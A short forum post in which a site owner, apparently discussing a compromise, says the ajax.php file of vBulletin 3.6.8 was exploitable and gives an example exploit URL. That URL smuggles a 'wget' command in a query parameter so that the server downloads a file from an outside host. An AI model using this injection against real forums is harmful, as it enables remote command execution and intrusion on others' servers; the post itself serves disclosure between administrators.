Quote:
Originally Posted by Simon Lloyd
|
Yes I have VBSEO although I cant' even remember what it does.
It was definitely the ajax.php file in 3.6.8 - the guys at Total Server Solutions tried a test of the exploit on it and it worked. They put on a vb 4.x ajax.php file and tried the exploit, and it didn't work.
Exploit in 3.6.8 ajax.php (example):
Code:
http://forum.mydomain.com/ajax.php?global=wget%20http://www.whatever.com/images/logo2.png